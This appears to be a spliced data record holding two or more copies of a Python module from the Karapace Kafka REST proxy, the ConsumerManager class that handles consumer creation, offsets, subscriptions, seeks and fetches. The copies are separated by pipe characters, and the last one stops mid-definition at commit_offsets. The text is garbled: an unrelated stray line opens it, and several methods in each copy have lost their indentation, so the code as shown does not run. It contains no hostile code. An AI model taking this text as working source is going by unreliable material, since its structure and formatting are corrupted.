            outfile.write('\n'.join(path_listings))
|
from asyncio import Lock
from collections import defaultdict, namedtuple
from functools import partial
from http import HTTPStatus
from kafka import KafkaConsumer
from kafka.errors import IllegalStateError, KafkaConfigurationError, KafkaError
from kafka.structs import OffsetAndMetadata, TopicPartition
from karapace.kafka_rest_apis.error_codes import RESTErrorCodes
from karapace.karapace import empty_response, KarapaceBase
from karapace.serialization import InvalidMessageHeader, InvalidPayload, SchemaRegistryDeserializer
from karapace.utils import convert_to_int
from struct import error as UnpackError
from typing import Tuple
from urllib.parse import urljoin
import asyncio
import base64
import logging
import time
import ujson
import uuid
# Embedded message formats the REST proxy can serve; other values are rejected at consumer creation.
KNOWN_FORMATS = {"json", "avro", "binary", "jsonschema", "protobuf"}
# Accepted values for the Kafka "auto.offset.reset" consumer option.
OFFSET_RESET_STRATEGIES = {"latest", "earliest"}
# Registry entry: the raw KafkaConsumer, its declared message format, and the creation-request config.
TypedConsumer = namedtuple("TypedConsumer", ["consumer", "serialization_format", "config"])
class ConsumerManager:
    """Tracks REST-proxy consumer instances and serializes access to each one."""

    def __init__(self, config: dict) -> None:
        self.config = config
        # Base URI advertised to clients in consumer-creation responses.
        # Use single quotes for the subscript keys: reusing double quotes inside a
        # double-quoted f-string is a SyntaxError before Python 3.12 (PEP 701).
        self.hostname = f"http://{self.config['advertised_hostname']}:{self.config['port']}"
        self.log = logging.getLogger("RestConsumerManager")
        self.deserializer = SchemaRegistryDeserializer(config=config)
        self.consumers = {}  # (group, name) -> TypedConsumer
        self.consumer_locks = defaultdict(Lock)  # one asyncio.Lock per consumer
def new_name(self) -> str:
name = str(uuid.uuid4())
self.log.debug("Generated new consumer name: %s", name)
return name
@staticmethod
def _assert(cond: bool, code: HTTPStatus, sub_code: int, message: str, content_type: str) -> None:
if not cond:
KarapaceBase.r(content_type=content_type, status=code, body={"message": message, "error_code": sub_code})
def _assert_consumer_exists(self, internal_name: Tuple[str, str], content_type: str) -> None:
if internal_name not in self.consumers:
KarapaceBase.not_found(
message=f"Consumer for {internal_name} not found among {list(self.consumers.keys())}",
content_type=content_type,
sub_code=RESTErrorCodes.CONSUMER_NOT_FOUND.value,
)
    @staticmethod
    def _assert_positive_number(
        container: dict,
        key: str,
        content_type: str,
        code: HTTPStatus = HTTPStatus.INTERNAL_SERVER_ERROR,
        sub_code: int = RESTErrorCodes.INVALID_VALUE.value,
    ) -> None:
        """Fail the request unless container[key] exists and is an int >= 0."""
        ConsumerManager._assert_has_key(container, key, content_type)
        ConsumerManager._assert(
            isinstance(container[key], int) and container[key] >= 0,
            code=code,
            sub_code=sub_code,
            content_type=content_type,
            message=f"{key} must be a positive number",
        )
    @staticmethod
    def _assert_has_key(element: dict, key: str, content_type: str) -> None:
        """Fail the request with 500/INVALID_VALUE when *key* is absent from *element*."""
        ConsumerManager._assert(
            key in element,
            code=HTTPStatus.INTERNAL_SERVER_ERROR,
            sub_code=RESTErrorCodes.INVALID_VALUE.value,
            message=f"{key} missing from {element}",
            content_type=content_type,
        )
@staticmethod
def _has_topic_and_partition_keys(topic_data: dict, content_type: str):
for k in ["topic", "partition"]:
ConsumerManager._assert_has_key(topic_data, k, content_type)
    @staticmethod
    def _topic_and_partition_valid(cluster_metadata: dict, topic_data: dict, content_type: str):
        """Reply 404 unless topic_data's topic and partition exist in *cluster_metadata*."""
        ConsumerManager._has_topic_and_partition_keys(topic_data, content_type)
        topic = topic_data["topic"]
        partition = topic_data["partition"]
        if topic not in cluster_metadata["topics"]:
            KarapaceBase.not_found(
                message=f"Topic {topic} not found", content_type=content_type, sub_code=RESTErrorCodes.TOPIC_NOT_FOUND.value
            )
        partitions = {pi["partition"] for pi in cluster_metadata["topics"][topic]["partitions"]}
        if partition not in partitions:
            KarapaceBase.not_found(
                message=f"Partition {partition} not found for topic {topic}",
                content_type=content_type,
                sub_code=RESTErrorCodes.PARTITION_NOT_FOUND.value,
            )
@staticmethod
def create_internal_name(group_name: str, consumer_name: str) -> Tuple[str, str]:
return group_name, consumer_name
    @staticmethod
    def _validate_create_consumer(request: dict, content_type: str) -> None:
        """Validate (and default) a consumer-creation payload.

        Mutates *request*: "format" is defaulted to "binary". Invalid fields
        reply 422 with INVALID_CONSUMER_PARAMETERS.
        """
        consumer_data_valid = partial(
            ConsumerManager._assert,
            content_type=content_type,
            code=HTTPStatus.UNPROCESSABLE_ENTITY,
            sub_code=RESTErrorCodes.INVALID_CONSUMER_PARAMETERS.value,
        )
        request["format"] = request.get("format", "binary")
        consumer_data_valid(request["format"] in KNOWN_FORMATS, message="Invalid format type")
        min_bytes_key = "fetch.min.bytes"
        # -1 is Kafka's "no minimum" sentinel, hence the >= -1 bound
        consumer_data_valid(
            min_bytes_key not in request or isinstance(request[min_bytes_key], int) and request[min_bytes_key] >= -1,
            message=f"Expected {min_bytes_key} to be >= -1",
        )
        auto_reset_key = "auto.offset.reset"
        # NOTE(review): the literal "bar" in the message below looks like a leftover
        # example value baked into the error text — confirm whether clients rely on it.
        consumer_data_valid(
            cond=auto_reset_key not in request or request[auto_reset_key].lower() in OFFSET_RESET_STRATEGIES,
            message=f"Invalid value bar for configuration {auto_reset_key}: "
            f"String must be one of: {OFFSET_RESET_STRATEGIES}",
        )
@staticmethod
def _illegal_state_fail(message: str, content_type: str) -> None:
ConsumerManager._assert(
cond=False,
code=HTTPStatus.CONFLICT,
sub_code=RESTErrorCodes.ILLEGAL_STATE.value,
content_type=content_type,
message=message,
)
    @staticmethod
    def _update_partition_assignments(consumer: KafkaConsumer):
        """Force the consumer to complete a group rejoin and resolve fetch positions.

        This is (should be?) equivalent to calling poll on the consumer, which
        would return 0 results, since the subscription we just created will mean
        a rejoin is needed, which skips the actual fetching. Nevertheless, an
        actual call to poll is to be avoided and a better solution to this is
        desired (extend the consumer??).
        """
        # Reaches into kafka-python internals — may break on client upgrades.
        # pylint: disable=protected-access
        consumer._coordinator.poll()
        if not consumer._subscription.has_all_fetch_positions():
            consumer._update_fetch_positions(consumer._subscription.missing_fetch_positions())
        # pylint: enable=protected-access
# external api below
# CONSUMER
    async def create_consumer(self, group_name: str, request_data: dict, content_type: str):
        """Create and register a new consumer in *group_name*; reply with its base URI.

        Replies 409 when the requested name already exists in the group, and 500
        when the Kafka consumer configuration is rejected.
        """
        group_name = group_name.strip("/")
        self.log.info("Create consumer request for group %s", group_name)
        consumer_name = request_data.get("name") or self.new_name()
        internal_name = self.create_internal_name(group_name, consumer_name)
        async with self.consumer_locks[internal_name]:
            if internal_name in self.consumers:
                self.log.error("Error creating duplicate consumer in group %s with id %s", group_name, consumer_name)
                KarapaceBase.r(
                    status=HTTPStatus.CONFLICT,
                    content_type=content_type,
                    body={
                        "error_code": RESTErrorCodes.CONSUMER_ALREADY_EXISTS.value,
                        "message": f"Consumer {consumer_name} already exists",
                    },
                )
            self._validate_create_consumer(request_data, content_type)
            self.log.info(
                "Creating new consumer in group %s with id %s and request_info %r", group_name, consumer_name, request_data
            )
            # NOTE(review): "fetch_min_bytes" is converted here but the value read
            # below is "fetch.min.bytes" — confirm which key clients actually send.
            for k in ["consumer.request.timeout.ms", "fetch_min_bytes"]:
                convert_to_int(request_data, k, content_type)
            try:
                enable_commit = request_data.get("auto.commit.enable", self.config["consumer_enable_auto_commit"])
                if isinstance(enable_commit, str):
                    # JSON clients may send "true"/"false" strings
                    enable_commit = enable_commit.lower() == "true"
                request_data["consumer.request.timeout.ms"] = request_data.get(
                    "consumer.request.timeout.ms", self.config["consumer_request_timeout_ms"]
                )
                request_data["auto.commit.enable"] = enable_commit
                request_data["auto.offset.reset"] = request_data.get("auto.offset.reset", "earliest")
                fetch_min_bytes = request_data.get("fetch.min.bytes", self.config["fetch_min_bytes"])
                c = await self.create_kafka_consumer(fetch_min_bytes, group_name, internal_name, request_data)
            except KafkaConfigurationError as e:
                KarapaceBase.internal_error(str(e), content_type)
            self.consumers[internal_name] = TypedConsumer(
                consumer=c, serialization_format=request_data["format"], config=request_data
            )
            base_uri = urljoin(self.hostname, f"consumers/{group_name}/instances/{consumer_name}")
            KarapaceBase.r(content_type=content_type, body={"base_uri": base_uri, "instance_id": consumer_name})
async def create_kafka_consumer(self, fetch_min_bytes, group_name, internal_name, request_data):
while True:
try:
session_timeout_ms = self.config["session_timeout_ms"]
request_timeout_ms = max(
session_timeout_ms,
KafkaConsumer.DEFAULT_CONFIG["request_timeout_ms"],
request_data["consumer.request.timeout.ms"],
)
c = KafkaConsumer(
bootstrap_servers=self.config["bootstrap_uri"],
client_id=internal_name,
security_protocol=self.config["security_protocol"],
ssl_cafile=self.config["ssl_cafile"],
ssl_certfile=self.config["ssl_certfile"],
ssl_keyfile=self.config["ssl_keyfile"],
sasl_mechanism=self.config["sasl_mechanism"],
sasl_plain_username=self.config["sasl_plain_username"],
sasl_plain_password=self.config["sasl_plain_password"],
group_id=group_name,
fetch_min_bytes=fetch_min_bytes,
fetch_max_bytes=self.config["consumer_request_max_bytes"],
request_timeout_ms=request_timeout_ms,
enable_auto_commit=request_data["auto.commit.enable"],
auto_offset_reset=request_data["auto.offset.reset"],
session_timeout_ms=session_timeout_ms,
)
return c
except: # pylint: disable=bare-except
self.log.exception("Unable to create consumer, retrying")
await asyncio.sleep(1)
    async def delete_consumer(self, internal_name: Tuple[str, str], content_type: str):
        """Remove and close the consumer; always replies with an empty body (via finally)."""
        self.log.info("Deleting consumer for %s", internal_name)
        self._assert_consumer_exists(internal_name, content_type)
        async with self.consumer_locks[internal_name]:
            try:
                c = self.consumers.pop(internal_name)
                c.consumer.close()
                # dropping the lock entry while it is held appears intentional
                # (no new waiters can exist once the consumer is unregistered)
                self.consumer_locks.pop(internal_name)
            except:  # pylint: disable=bare-except
                # best-effort teardown. NOTE(review): a bare except also swallows
                # CancelledError/KeyboardInterrupt — consider "except Exception".
                self.log.exception("Unable to properly dispose of consumer")
            finally:
                empty_response()
# OFFSETS
    async def commit_offsets(
        self, internal_name: Tuple[str, str], content_type: str, request_data: dict, cluster_metadata: dict
    ):
        """Commit the given offsets (or the current position when none are given), reply empty."""
        self.log.info("Committing offsets for %s", internal_name)
        self._assert_consumer_exists(internal_name, content_type)
        if request_data:
            self._assert_has_key(request_data, "offsets", content_type)
        payload = {}
        for el in request_data.get("offsets", []):
            for k in ["partition", "offset"]:
                convert_to_int(el, k, content_type)
            # If we commit for a partition that does not belong to this consumer, then the internal error raised
            # is marked as retriable, and thus the commit method will remain blocked in what looks like an infinite loop
            self._topic_and_partition_valid(cluster_metadata, el, content_type)
            # Kafka stores the *next* offset to consume, hence the +1
            payload[TopicPartition(el["topic"], el["partition"])] = OffsetAndMetadata(el["offset"] + 1, None)
        async with self.consumer_locks[internal_name]:
            consumer = self.consumers[internal_name].consumer
            payload = payload or None  # None means "commit current consumed positions"
            try:
                consumer.commit(offsets=payload)
            except KafkaError as e:
                KarapaceBase.internal_error(message=f"error sending commit request: {e}", content_type=content_type)
        empty_response()
    async def get_offsets(self, internal_name: Tuple[str, str], content_type: str, request_data: dict):
        """Reply with the committed offset and metadata for each requested partition."""
        self.log.info("Retrieving offsets for %s", internal_name)
        self._assert_consumer_exists(internal_name, content_type)
        self._assert_has_key(request_data, "partitions", content_type)
        response = {"offsets": []}
        async with self.consumer_locks[internal_name]:
            consumer = self.consumers[internal_name].consumer
            for el in request_data["partitions"]:
                convert_to_int(el, "partition", content_type)
                tp = TopicPartition(el["topic"], el["partition"])
                commit_info = consumer.committed(tp, metadata=True)
                if not commit_info:
                    # partitions with no committed offset are silently omitted
                    continue
                response["offsets"].append(
                    {
                        "topic": tp.topic,
                        "partition": tp.partition,
                        "metadata": commit_info.metadata,
                        "offset": commit_info.offset,
                    }
                )
        KarapaceBase.r(body=response, content_type=content_type)
# SUBSCRIPTION
    async def set_subscription(self, internal_name: Tuple[str, str], content_type: str, request_data: dict):
        """Subscribe the consumer to explicit topics or a topic pattern, then reply empty."""
        self.log.info("Updating subscription for %s", internal_name)
        self._assert_consumer_exists(internal_name, content_type)
        topics = request_data.get("topics", [])
        topics_pattern = request_data.get("topic_pattern")
        async with self.consumer_locks[internal_name]:
            consumer = self.consumers[internal_name].consumer
            try:
                consumer.subscribe(topics=topics, pattern=topics_pattern)
                # force the rejoin/position refresh so later fetches see the new subscription
                self._update_partition_assignments(consumer)
                empty_response()
            except AssertionError:
                # kafka-python asserts when neither topics nor a pattern is supplied
                self._illegal_state_fail(
                    message="Neither topic_pattern nor topics are present in request", content_type=content_type
                )
            except IllegalStateError as e:
                self._illegal_state_fail(str(e), content_type=content_type)
            finally:
                self.log.info("Done updating subscription")
async def get_subscription(self, internal_name: Tuple[str, str], content_type: str):
self.log.info("Retrieving subscription for %s", internal_name)
self._assert_consumer_exists(internal_name, content_type)
async with self.consumer_locks[internal_name]:
consumer = self.consumers[internal_name].consumer
if consumer.subscription() is None:
topics = []
else:
topics = list(consumer.subscription())
KarapaceBase.r(content_type=content_type, body={"topics": topics})
async def delete_subscription(self, internal_name: Tuple[str, str], content_type: str):
self.log.info("Deleting subscription for %s", internal_name)
self._assert_consumer_exists(internal_name, content_type)
async with self.consumer_locks[internal_name]:
self.consumers[internal_name].consumer.unsubscribe()
empty_response()
# ASSIGNMENTS
    async def set_assignments(self, internal_name: Tuple[str, str], content_type: str, request_data: dict):
        """Manually assign the consumer to the requested partitions, then reply empty."""
        self.log.info("Updating assignments for %s to %r", internal_name, request_data)
        self._assert_consumer_exists(internal_name, content_type)
        self._assert_has_key(request_data, "partitions", content_type)
        partitions = []
        for el in request_data["partitions"]:
            convert_to_int(el, "partition", content_type)
            self._has_topic_and_partition_keys(el, content_type)
            partitions.append(TopicPartition(el["topic"], el["partition"]))
        async with self.consumer_locks[internal_name]:
            try:
                consumer = self.consumers[internal_name].consumer
                consumer.assign(partitions)
                self._update_partition_assignments(consumer)
                empty_response()
            except IllegalStateError as e:
                # assign() is illegal while a group subscription is active
                self._illegal_state_fail(message=str(e), content_type=content_type)
            finally:
                self.log.info("Done updating assignment")
async def get_assignments(self, internal_name: Tuple[str, str], content_type: str):
self.log.info("Retrieving assignment for %s", internal_name)
self._assert_consumer_exists(internal_name, content_type)
async with self.consumer_locks[internal_name]:
consumer = self.consumers[internal_name].consumer
KarapaceBase.r(
content_type=content_type,
body={"partitions": [{"topic": pd.topic, "partition": pd.partition} for pd in consumer.assignment()]},
)
# POSITIONS
    async def seek_to(self, internal_name: Tuple[str, str], content_type: str, request_data: dict):
        """Seek the consumer to an explicit offset on each requested partition, then reply empty."""
        self.log.info("Resetting offsets for %s to %r", internal_name, request_data)
        self._assert_consumer_exists(internal_name, content_type)
        self._assert_has_key(request_data, "offsets", content_type)
        seeks = []
        for el in request_data["offsets"]:
            self._assert_has_key(el, "topic", content_type)
            for k in ["offset", "partition"]:
                self._assert_has_key(el, k, content_type)
                convert_to_int(el, k, content_type)
            self._assert_positive_number(el, "offset", content_type)
            seeks.append((TopicPartition(topic=el["topic"], partition=el["partition"]), el["offset"]))
        async with self.consumer_locks[internal_name]:
            consumer = self.consumers[internal_name].consumer
            for part, offset in seeks:
                try:
                    consumer.seek(part, offset)
                except AssertionError:
                    # kafka-python asserts when seeking a partition this consumer does not own
                    self._illegal_state_fail(f"Partition {part} is unassigned", content_type)
            empty_response()
    async def seek_limit(
        self, internal_name: Tuple[str, str], content_type: str, request_data: dict, beginning: bool = True
    ):
        """Seek each requested partition to the log's beginning (default) or end, then reply empty."""
        direction = "beginning" if beginning else "end"
        self.log.info("Seeking %s offsets", direction)
        self._assert_consumer_exists(internal_name, content_type)
        self._assert_has_key(request_data, "partitions", content_type)
        resets = []
        for el in request_data["partitions"]:
            convert_to_int(el, "partition", content_type)
            for k in ["topic", "partition"]:
                self._assert_has_key(el, k, content_type)
            resets.append(TopicPartition(topic=el["topic"], partition=el["partition"]))
        async with self.consumer_locks[internal_name]:
            consumer = self.consumers[internal_name].consumer
            try:
                if beginning:
                    consumer.seek_to_beginning(*resets)
                else:
                    consumer.seek_to_end(*resets)
                empty_response()
            except AssertionError:
                # kafka-python asserts when any listed partition is not assigned to this consumer
                self._illegal_state_fail(f"Trying to reset unassigned partitions to {direction}", content_type)
    async def fetch(self, internal_name: Tuple[str, str], content_type: str, formats: dict, query_params: dict):
        """Poll messages for the consumer until max_bytes or the timeout is reached.

        Records are deserialized per the consumer's registered format; replies
        with a list of {topic, partition, offset, key, value} objects. A 406 is
        returned when the requested embedded format does not match the consumer.
        """
        self.log.info("Running fetch for name %s with parameters %r and formats %r", internal_name, query_params, formats)
        self._assert_consumer_exists(internal_name, content_type)
        async with self.consumer_locks[internal_name]:
            consumer = self.consumers[internal_name].consumer
            serialization_format = self.consumers[internal_name].serialization_format
            config = self.consumers[internal_name].config
            request_format = formats["embedded_format"]
            self._assert(
                cond=serialization_format == request_format,
                code=HTTPStatus.NOT_ACCEPTABLE,
                sub_code=RESTErrorCodes.UNSUPPORTED_FORMAT.value,
                content_type=content_type,
                message=f"Consumer format {serialization_format} does not match the embedded format {request_format}",
            )
            self.log.info("Fetch request for %s with params %r", internal_name, query_params)
            try:
                timeout = (
                    int(query_params["timeout"]) if "timeout" in query_params else config["consumer.request.timeout.ms"]
                )
                # we get to be more in line with the confluent proxy by doing a bunch of fetches each time and
                # respecting the max fetch request size
                max_bytes = (
                    int(query_params["max_bytes"]) if "max_bytes" in query_params else consumer.config["fetch_max_bytes"]
                )
            except ValueError:
                # NOTE(review): this relies on internal_error() raising/aborting;
                # otherwise timeout/max_bytes would be unbound below — confirm.
                KarapaceBase.internal_error(message=f"Invalid request parameters: {query_params}", content_type=content_type)
            for val in [timeout, max_bytes]:
                if not val:
                    continue
                if val <= 0:
                    KarapaceBase.internal_error(message=f"Invalid request parameter {val}", content_type=content_type)
            response = []
            self.log.info(
                "Will poll multiple times for a single message with a total timeout of %dms, "
                "until at least %d bytes have been fetched",
                timeout,
                max_bytes,
            )
            read_bytes = 0
            start_time = time.monotonic()
            poll_data = defaultdict(list)
            message_count = 0
            # keep polling single records until the byte budget or the deadline runs out
            while read_bytes < max_bytes and start_time + timeout / 1000 > time.monotonic():
                time_left = start_time + timeout / 1000 - time.monotonic()
                bytes_left = max_bytes - read_bytes
                self.log.info(
                    "Polling with %r time left and %d bytes left, gathered %d messages so far",
                    time_left,
                    bytes_left,
                    message_count,
                )
                data = consumer.poll(timeout_ms=timeout, max_records=1)
                self.log.debug("Successfully polled for messages")
                for topic, records in data.items():
                    for rec in records:
                        message_count += 1
                        # serialized sizes are -1 when absent, hence the max(0, ...) clamps
                        read_bytes += (
                            max(0, rec.serialized_key_size)
                            + max(0, rec.serialized_value_size)
                            + max(0, rec.serialized_header_size)
                        )
                        poll_data[topic].append(rec)
            self.log.info("Gathered %d total messages", message_count)
            for tp in poll_data:
                for msg in poll_data[tp]:
                    try:
                        key = await self.deserialize(msg.key, request_format) if msg.key else None
                        value = await self.deserialize(msg.value, request_format) if msg.value else None
                    except (UnpackError, InvalidMessageHeader, InvalidPayload) as e:
                        KarapaceBase.internal_error(message=f"deserialization error: {e}", content_type=content_type)
                    element = {
                        "topic": tp.topic,
                        "partition": tp.partition,
                        "offset": msg.offset,
                        "key": key,
                        "value": value,
                    }
                    response.append(element)
            KarapaceBase.r(content_type=content_type, body=response)
async def deserialize(self, bytes_: bytes, fmt: str):
if not bytes_:
return None
if fmt in {"avro", "jsonschema", "protobuf"}:
return await self.deserializer.deserialize(bytes_)
if fmt == "json":
return ujson.loads(bytes_.decode("utf-8"))
return base64.b64encode(bytes_).decode("utf-8")
def close(self):
for k in list(self.consumers.keys()):
c = self.consumers.pop(k)
try:
c.consumer.close()
except: # pylint: disable=bare-except
pass
| from asyncio import Lock
from collections import defaultdict, namedtuple
from functools import partial
from http import HTTPStatus
from kafka import KafkaConsumer
from kafka.errors import IllegalStateError, KafkaConfigurationError, KafkaError
from kafka.structs import OffsetAndMetadata, TopicPartition
from karapace.kafka_rest_apis.error_codes import RESTErrorCodes
from karapace.karapace import empty_response, KarapaceBase
from karapace.serialization import InvalidMessageHeader, InvalidPayload, SchemaRegistryDeserializer
from karapace.utils import convert_to_int
from struct import error as UnpackError
from typing import Tuple
from urllib.parse import urljoin
import asyncio
import base64
import logging
import time
import ujson
import uuid
KNOWN_FORMATS = {"json", "avro", "binary", "jsonschema", "protobuf"}
OFFSET_RESET_STRATEGIES = {"latest", "earliest"}
TypedConsumer = namedtuple("TypedConsumer", ["consumer", "serialization_format", "config"])
class ConsumerManager:
    """REST-proxy consumer registry.

    Tracks Kafka consumer instances keyed by (group_name, consumer_name) and
    implements the consumer-related REST operations (create/delete, offsets,
    subscriptions, assignments, seeks and fetches).  All per-consumer work is
    serialized through an asyncio.Lock held in ``consumer_locks``.
    """

    def __init__(self, config: dict) -> None:
        self.config = config
        # Base URI advertised back to clients in create_consumer responses.
        self.hostname = f"http://{self.config['advertised_hostname']}:{self.config['port']}"
        self.log = logging.getLogger("RestConsumerManager")
        self.deserializer = SchemaRegistryDeserializer(config=config)
        # (group, name) -> TypedConsumer(consumer, serialization_format, config)
        self.consumers = {}
        # defaultdict: the lock for a given consumer is created on first access.
        self.consumer_locks = defaultdict(Lock)

    def new_name(self) -> str:
        """Generate a random consumer instance name."""
        name = str(uuid.uuid4())
        self.log.debug("Generated new consumer name: %s", name)
        return name

    @staticmethod
    def _assert(cond: bool, code: HTTPStatus, sub_code: int, message: str, content_type: str) -> None:
        # Fail the current request with code/sub_code unless cond holds.
        # NOTE(review): callers never inspect a return value, so KarapaceBase.r
        # is assumed to terminate the request -- confirm it raises.
        if not cond:
            KarapaceBase.r(content_type=content_type, status=code, body={"message": message, "error_code": sub_code})

    def _assert_consumer_exists(self, internal_name: Tuple[str, str], content_type: str) -> None:
        """Respond 404 CONSUMER_NOT_FOUND when *internal_name* is not registered."""
        if internal_name not in self.consumers:
            KarapaceBase.not_found(
                message=f"Consumer for {internal_name} not found among {list(self.consumers.keys())}",
                content_type=content_type,
                sub_code=RESTErrorCodes.CONSUMER_NOT_FOUND.value,
            )

    @staticmethod
    def _assert_positive_number(
        container: dict,
        key: str,
        content_type: str,
        code: HTTPStatus = HTTPStatus.INTERNAL_SERVER_ERROR,
        sub_code: int = RESTErrorCodes.INVALID_VALUE.value,
    ) -> None:
        """Require container[key] to exist and be a non-negative int."""
        ConsumerManager._assert_has_key(container, key, content_type)
        ConsumerManager._assert(
            isinstance(container[key], int) and container[key] >= 0,
            code=code,
            sub_code=sub_code,
            content_type=content_type,
            message=f"{key} must be a positive number",
        )

    @staticmethod
    def _assert_has_key(element: dict, key: str, content_type: str) -> None:
        """Require *key* to be present in *element*."""
        ConsumerManager._assert(
            key in element,
            code=HTTPStatus.INTERNAL_SERVER_ERROR,
            sub_code=RESTErrorCodes.INVALID_VALUE.value,
            message=f"{key} missing from {element}",
            content_type=content_type,
        )

    @staticmethod
    def _has_topic_and_partition_keys(topic_data: dict, content_type: str):
        """Require both "topic" and "partition" keys in *topic_data*."""
        for k in ["topic", "partition"]:
            ConsumerManager._assert_has_key(topic_data, k, content_type)

    @staticmethod
    def _topic_and_partition_valid(cluster_metadata: dict, topic_data: dict, content_type: str):
        """Respond 404 when the topic/partition in *topic_data* is unknown to the cluster."""
        ConsumerManager._has_topic_and_partition_keys(topic_data, content_type)
        topic = topic_data["topic"]
        partition = topic_data["partition"]
        if topic not in cluster_metadata["topics"]:
            KarapaceBase.not_found(
                message=f"Topic {topic} not found", content_type=content_type, sub_code=RESTErrorCodes.TOPIC_NOT_FOUND.value
            )
        partitions = {pi["partition"] for pi in cluster_metadata["topics"][topic]["partitions"]}
        if partition not in partitions:
            KarapaceBase.not_found(
                message=f"Partition {partition} not found for topic {topic}",
                content_type=content_type,
                sub_code=RESTErrorCodes.PARTITION_NOT_FOUND.value,
            )

    @staticmethod
    def create_internal_name(group_name: str, consumer_name: str) -> Tuple[str, str]:
        """The registry key for a consumer: the (group, name) pair."""
        return group_name, consumer_name
@staticmethod
def _validate_create_consumer(request: dict, content_type: str) -> None:
consumer_data_valid = partial(
ConsumerManager._assert,
content_type=content_type,
code=HTTPStatus.UNPROCESSABLE_ENTITY,
sub_code=RESTErrorCodes.INVALID_CONSUMER_PARAMETERS.value,
)
request["format"] = request.get("format", "binary")
consumer_data_valid(request["format"] in KNOWN_FORMATS, message="Invalid format type")
min_bytes_key = "fetch.min.bytes"
consumer_data_valid(
min_bytes_key not in request or isinstance(request[min_bytes_key], int) and request[min_bytes_key] >= -1,
message=f"Expected {min_bytes_key} to be >= -1",
)
auto_reset_key = "auto.offset.reset"
consumer_data_valid(
cond=auto_reset_key not in request or request[auto_reset_key].lower() in OFFSET_RESET_STRATEGIES,
message=f"Invalid value bar for configuration {auto_reset_key}: "
f"String must be one of: {OFFSET_RESET_STRATEGIES}",
)
    @staticmethod
    def _illegal_state_fail(message: str, content_type: str) -> None:
        """Unconditionally fail the request with 409 CONFLICT / ILLEGAL_STATE."""
        ConsumerManager._assert(
            cond=False,
            code=HTTPStatus.CONFLICT,
            sub_code=RESTErrorCodes.ILLEGAL_STATE.value,
            content_type=content_type,
            message=message,
        )

    @staticmethod
    def _update_partition_assignments(consumer: KafkaConsumer):
        """Eagerly trigger a group rejoin and refresh fetch positions without fetching records."""
        # This is (should be?) equivalent to calling poll on the consumer.
        # which would return 0 results, since the subscription we just created will mean
        # a rejoin is needed, which skips the actual fetching. Nevertheless, an actual call to poll is to be avoided
        # and a better solution to this is desired (extend the consumer??)
        # NOTE(review): relies on kafka-python private internals; fragile
        # against library upgrades.
        # pylint: disable=protected-access
        consumer._coordinator.poll()
        if not consumer._subscription.has_all_fetch_positions():
            consumer._update_fetch_positions(consumer._subscription.missing_fetch_positions())
        # pylint: enable=protected-access
    # external api below
    # CONSUMER
    async def create_consumer(self, group_name: str, request_data: dict, content_type: str):
        """Create and register a new consumer instance in *group_name*.

        Responds 409 when the requested name already exists; otherwise
        validates the request, builds a KafkaConsumer and responds with the
        instance's base URI.
        """
        group_name = group_name.strip("/")
        self.log.info("Create consumer request for group %s", group_name)
        consumer_name = request_data.get("name") or self.new_name()
        internal_name = self.create_internal_name(group_name, consumer_name)
        async with self.consumer_locks[internal_name]:
            if internal_name in self.consumers:
                self.log.error("Error creating duplicate consumer in group %s with id %s", group_name, consumer_name)
                KarapaceBase.r(
                    status=HTTPStatus.CONFLICT,
                    content_type=content_type,
                    body={
                        "error_code": RESTErrorCodes.CONSUMER_ALREADY_EXISTS.value,
                        "message": f"Consumer {consumer_name} already exists",
                    },
                )
            self._validate_create_consumer(request_data, content_type)
            self.log.info(
                "Creating new consumer in group %s with id %s and request_info %r", group_name, consumer_name, request_data
            )
            # Numeric fields may arrive as strings; coerce them up front.
            for k in ["consumer.request.timeout.ms", "fetch_min_bytes"]:
                convert_to_int(request_data, k, content_type)
            try:
                # Fill defaults from the proxy configuration for anything the
                # client did not specify.
                enable_commit = request_data.get("auto.commit.enable", self.config["consumer_enable_auto_commit"])
                if isinstance(enable_commit, str):
                    enable_commit = enable_commit.lower() == "true"
                request_data["consumer.request.timeout.ms"] = request_data.get(
                    "consumer.request.timeout.ms", self.config["consumer_request_timeout_ms"]
                )
                request_data["auto.commit.enable"] = enable_commit
                request_data["auto.offset.reset"] = request_data.get("auto.offset.reset", "earliest")
                fetch_min_bytes = request_data.get("fetch.min.bytes", self.config["fetch_min_bytes"])
                c = await self.create_kafka_consumer(fetch_min_bytes, group_name, internal_name, request_data)
            except KafkaConfigurationError as e:
                KarapaceBase.internal_error(str(e), content_type)
            self.consumers[internal_name] = TypedConsumer(
                consumer=c, serialization_format=request_data["format"], config=request_data
            )
            base_uri = urljoin(self.hostname, f"consumers/{group_name}/instances/{consumer_name}")
            KarapaceBase.r(content_type=content_type, body={"base_uri": base_uri, "instance_id": consumer_name})
    async def create_kafka_consumer(self, fetch_min_bytes, group_name, internal_name, request_data):
        """Build the underlying KafkaConsumer, retrying once a second on failure.

        NOTE(review): the bare except retries on *any* error forever with no
        back-off or give-up; confirm this availability-over-failfast behavior
        is intended.
        """
        while True:
            try:
                session_timeout_ms = self.config["session_timeout_ms"]
                # The request timeout must not be lower than the session
                # timeout or the client library's own default.
                request_timeout_ms = max(
                    session_timeout_ms,
                    KafkaConsumer.DEFAULT_CONFIG["request_timeout_ms"],
                    request_data["consumer.request.timeout.ms"],
                )
                c = KafkaConsumer(
                    bootstrap_servers=self.config["bootstrap_uri"],
                    client_id=internal_name,
                    security_protocol=self.config["security_protocol"],
                    ssl_cafile=self.config["ssl_cafile"],
                    ssl_certfile=self.config["ssl_certfile"],
                    ssl_keyfile=self.config["ssl_keyfile"],
                    sasl_mechanism=self.config["sasl_mechanism"],
                    sasl_plain_username=self.config["sasl_plain_username"],
                    sasl_plain_password=self.config["sasl_plain_password"],
                    group_id=group_name,
                    fetch_min_bytes=fetch_min_bytes,
                    fetch_max_bytes=self.config["consumer_request_max_bytes"],
                    request_timeout_ms=request_timeout_ms,
                    enable_auto_commit=request_data["auto.commit.enable"],
                    auto_offset_reset=request_data["auto.offset.reset"],
                    session_timeout_ms=session_timeout_ms,
                )
                return c
            except:  # pylint: disable=bare-except
                self.log.exception("Unable to create consumer, retrying")
                await asyncio.sleep(1)
    async def delete_consumer(self, internal_name: Tuple[str, str], content_type: str):
        """Close and unregister a consumer; always responds with an empty body."""
        self.log.info("Deleting consumer for %s", internal_name)
        self._assert_consumer_exists(internal_name, content_type)
        async with self.consumer_locks[internal_name]:
            try:
                c = self.consumers.pop(internal_name)
                c.consumer.close()
                self.consumer_locks.pop(internal_name)
            except:  # pylint: disable=bare-except
                # Best effort: a failed close must not prevent the success reply.
                self.log.exception("Unable to properly dispose of consumer")
            finally:
                empty_response()
    # OFFSETS
    async def commit_offsets(
